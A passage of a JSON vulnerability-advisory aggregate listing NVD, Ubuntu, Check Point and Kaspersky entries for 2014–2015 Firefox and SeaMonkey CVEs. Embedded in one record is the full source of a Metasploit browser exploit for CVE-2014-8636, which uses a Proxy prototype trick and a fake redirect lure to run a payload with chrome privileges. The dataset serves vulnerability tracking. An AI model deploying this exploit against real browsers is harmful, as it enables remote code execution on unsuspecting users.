["CVE-2014-8641"], "modified": "2015-01-14T00:00:00", "id": "UB:CVE-2014-8641", "href": "https://ubuntu.com/security/CVE-2014-8641", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:17:09", "description": "The navigator.sendBeacon implementation in Mozilla Firefox before 37.0,\nFirefox ESR 31.x before 31.6, and Thunderbird before 31.6 processes HTTP\n30x status codes for redirects after a preflight request has occurred,\nwhich allows remote attackers to bypass intended CORS access-control checks\nand conduct cross-site request forgery (CSRF) attacks via a crafted web\nsite, a similar issue to CVE-2014-8638.", "cvss3": {}, "published": "2015-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2015-0807", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8638", "CVE-2015-0807"], "modified": "2015-04-01T00:00:00", "id": "UB:CVE-2015-0807", "href": "https://ubuntu.com/security/CVE-2015-0807", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-02-09T10:17:00", "description": "Mozilla Firefox before 35.0 and SeaMonkey before 2.32 do not properly initialize memory for BMP images, which allows remote attackers to obtain sensitive information from process memory via a crafted web page that triggers the rendering of malformed BMP data within a CANVAS element.", "cvss3": {}, "published": "2015-01-14T11:59:00", "type": "cve", "title": "CVE-2014-8637", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8637"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:mozilla:firefox:34.0.5", "cpe:/a:mozilla:seamonkey:2.31"], "id": "CVE-2014-8637", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8637", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:34.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.31:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T10:17:01", "description": "Mozilla Firefox before 35.0 and SeaMonkey before 2.32 do not consider the id-pkix-ocsp-nocheck extension in deciding whether to trust an OCSP responder, which makes it easier for remote attackers to obtain sensitive information by sniffing the network during a session in which there was an incorrect decision to accept a compromised and revoked certificate.", "cvss3": {}, "published": "2015-01-14T11:59:00", "type": "cve", "title": "CVE-2014-8642", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8642"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/o:opensuse:opensuse:13.2", "cpe:/a:mozilla:firefox:34.0.5", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:mozilla:seamonkey:2.31"], "id": "CVE-2014-8642", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8642", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:34.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.31:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T10:17:00", "description": "The mozilla::dom::AudioParamTimeline::AudioNodeInputValue function in the Web Audio API implementation in Mozilla Firefox before 35.0 and SeaMonkey before 2.32 does not properly restrict timeline operations, which allows remote attackers to cause a denial of service (uninitialized-memory read and application crash) via crafted API calls.", "cvss3": {}, "published": "2015-01-14T11:59:00", "type": "cve", "title": "CVE-2014-8640", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8640"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/o:opensuse:opensuse:13.2", "cpe:/a:mozilla:firefox:34.0.5", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:mozilla:seamonkey:2.31"], "id": "CVE-2014-8640", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8640", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:34.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.31:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T10:17:00", "description": "The XrayWrapper implementation in Mozilla Firefox before 35.0 and SeaMonkey before 2.32 does not properly interact with a DOM object that has a named getter, which might allow remote attackers to execute arbitrary JavaScript code with chrome privileges via unspecified vectors.", "cvss3": {}, "published": "2015-01-14T11:59:00", "type": "cve", "title": "CVE-2014-8636", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8636"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:mozilla:firefox:34.0.5", "cpe:/a:mozilla:seamonkey:2.31"], "id": "CVE-2014-8636", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8636", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:34.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.31:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T10:17:03", "description": "Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 35.0 and SeaMonkey before 2.32 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.", "cvss3": {}, "published": "2015-01-14T11:59:00", "type": "cve", "title": "CVE-2014-8635", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8635"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/a:mozilla:firefox:34.0.5", "cpe:/a:mozilla:seamonkey:2.31"], "id": "CVE-2014-8635", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8635", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:34.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.31:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T10:16:59", "description": "Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.", "cvss3": {}, "published": "2015-01-14T11:59:00", "type": "cve", "title": "CVE-2014-8634", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:mozilla:firefox_esr:31.2", "cpe:/a:mozilla:firefox_esr:31.1.0", "cpe:/a:mozilla:firefox:34.0.5", "cpe:/a:mozilla:seamonkey:2.31", "cpe:/a:mozilla:firefox_esr:31.0", "cpe:/a:mozilla:firefox_esr:31.3.0", "cpe:/a:mozilla:thunderbird:31.3.0", "cpe:/a:mozilla:firefox_esr:31.1.1"], "id": "CVE-2014-8634", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8634", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:34.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.31:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:31.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T10:17:00", "description": "The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.", "cvss3": {}, "published": "2015-01-14T11:59:00", "type": "cve", "title": "CVE-2014-8638", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8638"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:mozilla:firefox_esr:31.2", "cpe:/a:mozilla:firefox_esr:31.1.0", "cpe:/a:mozilla:firefox:34.0.5", "cpe:/a:mozilla:seamonkey:2.31", "cpe:/a:mozilla:firefox_esr:31.0", "cpe:/a:mozilla:firefox_esr:31.3.0", "cpe:/a:mozilla:thunderbird:31.3.0", "cpe:/a:mozilla:firefox_esr:31.1.1"], "id": "CVE-2014-8638", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8638", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:34.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.31:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:31.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T10:17:00", "description": "Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 do not properly interpret Set-Cookie headers within responses that have a 407 (aka Proxy Authentication Required) status code, which allows remote HTTP proxy servers to conduct session fixation attacks by providing a cookie name that corresponds to the session cookie of the origin server.", "cvss3": {}, "published": "2015-01-14T11:59:00", "type": "cve", "title": "CVE-2014-8639", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8639"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:mozilla:firefox_esr:31.2", "cpe:/a:mozilla:firefox_esr:31.1.0", "cpe:/a:mozilla:firefox:34.0.5", "cpe:/a:mozilla:seamonkey:2.31", "cpe:/a:mozilla:firefox_esr:31.0", "cpe:/a:mozilla:firefox_esr:31.3.0", "cpe:/a:mozilla:thunderbird:31.3.0", "cpe:/a:mozilla:firefox_esr:31.1.1"], "id": "CVE-2014-8639", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8639", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:34.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.31:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:31.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T10:17:01", "description": "Use-after-free vulnerability in the WebRTC implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, and SeaMonkey before 2.32 allows remote attackers to execute arbitrary code via crafted track data.", "cvss3": {}, "published": "2015-01-14T11:59:00", "type": "cve", "title": "CVE-2014-8641", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8641"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:mozilla:firefox_esr:31.2", "cpe:/a:mozilla:firefox_esr:31.1.0", "cpe:/a:mozilla:firefox:34.0.5", "cpe:/a:mozilla:seamonkey:2.31", "cpe:/a:mozilla:firefox_esr:31.0", "cpe:/a:mozilla:firefox_esr:31.3.0", "cpe:/a:mozilla:firefox_esr:31.1.1"], "id": "CVE-2014-8641", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8641", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:34.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.31:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T02:31:53", "description": "The navigator.sendBeacon implementation in Mozilla Firefox before 37.0, Firefox ESR 31.x before 31.6, and Thunderbird before 31.6 processes HTTP 30x status codes for redirects after a preflight request has occurred, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site, a similar issue to CVE-2014-8638.", "cvss3": {}, "published": "2015-04-01T10:59:00", "type": "cve", "title": "CVE-2015-0807", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8638", "CVE-2015-0807"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/a:mozilla:firefox_esr:31.2", "cpe:/a:mozilla:firefox:36.0.4", "cpe:/a:mozilla:firefox_esr:31.1.0", "cpe:/a:mozilla:thunderbird:31.5", "cpe:/a:mozilla:firefox_esr:31.5.1", "cpe:/a:mozilla:firefox_esr:31.5", "cpe:/a:mozilla:firefox_esr:31.0", "cpe:/a:mozilla:firefox_esr:31.3.0", "cpe:/a:mozilla:firefox_esr:31.5.2", "cpe:/a:mozilla:firefox_esr:31.4", "cpe:/a:mozilla:firefox_esr:31.1", "cpe:/a:mozilla:firefox_esr:31.3", "cpe:/a:mozilla:firefox_esr:31.5.3", "cpe:/a:mozilla:firefox_esr:31.1.1"], "id": "CVE-2015-0807", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0807", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mozilla:firefox_esr:31.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:36.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:31.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox_esr:31.1.0:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:50:27", "description": "A policy bypass vulnerability has been reported in Mozilla Firefox and SeaMonkey. The vulnerability is due to an issue with processing the derived trap has. A remote attacker can exploit this vulnerability by enticing a victim to open a maliciously crafted webpage.", "cvss3": {}, "published": "2015-04-19T00:00:00", "type": "checkpoint_advisories", "title": "Mozilla Firefox XrayWrapper Policy Bypass (CVE-2014-8636)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8636"], "modified": "2015-04-28T00:00:00", "id": "CPAI-2015-0489", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:51:25", "description": "A remote code execution vulnerability has been detected in Mozilla Firefox. A remote attacker may exploit this vulnerability by enticing users to open a specially crafted web-page. Successful exploitation would allow an attacker to execute arbitrary code in the user's security context.", "cvss3": {}, "published": "2015-03-26T00:00:00", "type": "checkpoint_advisories", "title": "Mozilla Firefox Proxy Prototype Remote Code Execution (CVE-2014-8636)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8636"], "modified": "2015-03-29T00:00:00", "id": "CPAI-2015-0398", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-01-10T19:03:46", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2015-03-27T00:00:00", "type": "zdt", "title": "Firefox Proxy Prototype Privileged Javascript Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-8636"], "modified": "2015-03-27T00:00:00", "id": "1337DAY-ID-23440", "href": "https://0day.today/exploit/description/23440", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\nrequire 'rex/exploitation/jsobfu'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n \r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n include Msf::Exploit::Remote::FirefoxPrivilegeEscalation\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Firefox Proxy Prototype Privileged Javascript Injection',\r\n 'Description' => %q{\r\n This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect\r\n component and gaining a reference to the privileged chrome:// window. This exploit\r\n requires the user to click anywhere on the page to trigger the vulnerability.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'joev' # discovery and metasploit module\r\n ],\r\n 'DisclosureDate' => \"Jan 20 2014\",\r\n 'References' => [\r\n ['CVE', '2014-8636'],\r\n ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1120261'],\r\n ['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636' ]\r\n \r\n ],\r\n 'Targets' => [\r\n [\r\n 'Universal (Javascript XPCOM Shell)', {\r\n 'Platform' => 'firefox',\r\n 'Arch' => ARCH_FIREFOX\r\n }\r\n ],\r\n [\r\n 'Native Payload', {\r\n 'Platform' => %w{ java linux osx solaris win },\r\n 'Arch' => ARCH_ALL\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'BrowserRequirements' => {\r\n :source => 'script',\r\n :ua_name => HttpClients::FF,\r\n :ua_ver => lambda { |ver| ver.to_i.between?(31, 34) }\r\n }\r\n ))\r\n \r\n register_options([\r\n OptString.new('CONTENT', [ false, \"Content to display inside the HTML <body>.\" ])\r\n ], self.class)\r\n end\r\n \r\n def on_request_exploit(cli, request, target_info)\r\n send_response_html(cli, generate_html(target_info))\r\n end\r\n \r\n def default_html\r\n \"The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected.\"\r\n end\r\n \r\n def generate_html(target_info)\r\n key = Rex::Text.rand_text_alpha(5 + rand(12))\r\n frame = Rex::Text.rand_text_alpha(5 + rand(12))\r\n r = Rex::Text.rand_text_alpha(5 + rand(12))\r\n opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin\r\n \r\n js = js_obfuscate %Q|\r\n var opts = #{JSON.unparse(opts)};\r\n var key = opts['#{key}'];\r\n var props = {};\r\n props.has = function(n){\r\n if (!window.top.x && n=='nodeType') {\r\n window.top.x=window.open(\"chrome://browser/content/browser.xul\", \"x\",\r\n \"chrome,,top=-9999px,left=-9999px,height=100px,width=100px\");\r\n if (window.top.x) {\r\n Object.setPrototypeOf(document, pro);\r\n setTimeout(function(){\r\n x.location='data:text/html,<iframe mozbrowser src=\"about:blank\"></iframe>';\r\n \r\n setTimeout(function(){\r\n x.messageManager.loadFrameScript('data:,'+key, false);\r\n setTimeout(function(){\r\n x.close();\r\n }, 100)\r\n }, 100)\r\n }, 100);\r\n }\r\n }\r\n }\r\n var pro = Object.getPrototypeOf(document);\r\n Object.setPrototypeOf(document, Proxy.create(props));\r\n |\r\n \r\n %Q|\r\n <!doctype html>\r\n <html>\r\n <body>\r\n <script>\r\n #{js}\r\n </script>\r\n #{datastore['CONTENT'] || default_html}\r\n </body>\r\n </html>\r\n |\r\n end\r\nend\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/23440", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "kaspersky": [{"lastseen": "2023-02-08T16:16:53", "description": "### *Detect date*:\n01/13/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nImproper DOM objects interaction was found in Mozilla products. By exploiting this vulnerability malicious users can execute arbitrary code. This culnerability can be exploited remotely via unspecified vectors.\n\n### *Affected products*:\nMozilla Firefox versions earlier than 35 \nMozilla SeaMonkey versions earlier than 2.32\n\n### *Solution*:\nUpdate to latest version \n[Get SeaMonkey](<http://www.seamonkey-project.org/releases/>) \n[Get Firefox](<https://www.mozilla.org/en-US/firefox/new/>)\n\n### *Original advisories*:\n[MFSA](<https://www.mozilla.org/en-US/security/advisories/mfsa2015-09/>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Mozilla Firefox](<https://threats.kaspersky.com/en/product/Mozilla-Firefox/>)\n\n### *CVE-IDS*:\n[CVE-2014-8636](<https://vulners.com/cve/CVE-2014-8636>)7.5Critical", "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "kaspersky", "title": "KLA10445 ACE vulnerability in Mozilla", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 